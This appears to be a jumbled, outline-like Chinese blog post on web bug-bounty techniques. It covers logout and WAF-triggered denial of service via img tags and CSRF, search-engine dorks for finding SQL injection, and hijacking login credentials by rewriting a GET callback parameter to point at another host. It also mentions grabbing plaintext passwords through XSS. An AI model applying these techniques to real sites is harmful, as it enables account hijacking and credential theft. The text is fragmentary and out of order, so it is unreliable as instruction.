@1kbfree
2020-03-30T14:19:29.000000Z
字数 1506
阅读 683
未分类
3、url退出|拒绝服务(不给你访问)漏洞
4、老套路:利用搜索语法来以洞挖洞
5、组合拳劫持用户凭证或密码
劫持get传递的凭证
利用xss获取用户明文密码(需交互)
学过html
的朋友都知道img
标签是引入图片,然后后台会访问这个链接如
<img src='http://www.freebuf.com/'>
那么这样的话就会后台自动访问http://www.freebuf.com/
,如果是图片的话会直接显示出来,那么我们可以利用后台访问这个特点来进行一个利用。
利用搜索引擎来挖洞,是一个技巧,是看运气的,不能保障有也不能保障没有。
site:xxx.com inurl: xxx.php?id=23333333333
site:xxx.com inurl: ooo.html?name=
访问页面
页面自动加载alert(1)
waf 拦截
导致页面不能访问
csrf + 修改头像地址为waf 拦截导致访问不了页面
访问页面
页面自动加载退出url
用户退出
登入
图片直接加载
用户退出
http://abc.xxx.com/xxx.php?id=23333333333 -> sql注入
site:xxx.com inurl:xxx.php?id=
http://bbb.xxx.com/xxx.php?id=23333333333
site:xxx.com inurl: ?name=
1、登录
2、然后会有一个xx.cb参数来鉴证凭证是否正确,如果正确说明登入成功
https://passport.xxx.com/wauthen/login?xx.action=uilogin&xx.realm=cloud.lps.xxx.com&xx.uinfo=username,nickname,pid&xx.lang=zh_CN&xx.ctx=aHR0cDovL3RvbmdidS5sZW5vdm8uY29tL2NvbnRhY3QvY29udGFjdC9wb3J0YWwvaG9tZS5odG1s&xx.cb=http://127.0.0.1/jc.php&xx.source=tongbu.xxx.com&display=
get传递密码或凭证,且没校验验证的地址
xss漏洞,无法打到cookie,因为有httponly
action=http://www.xx.xx/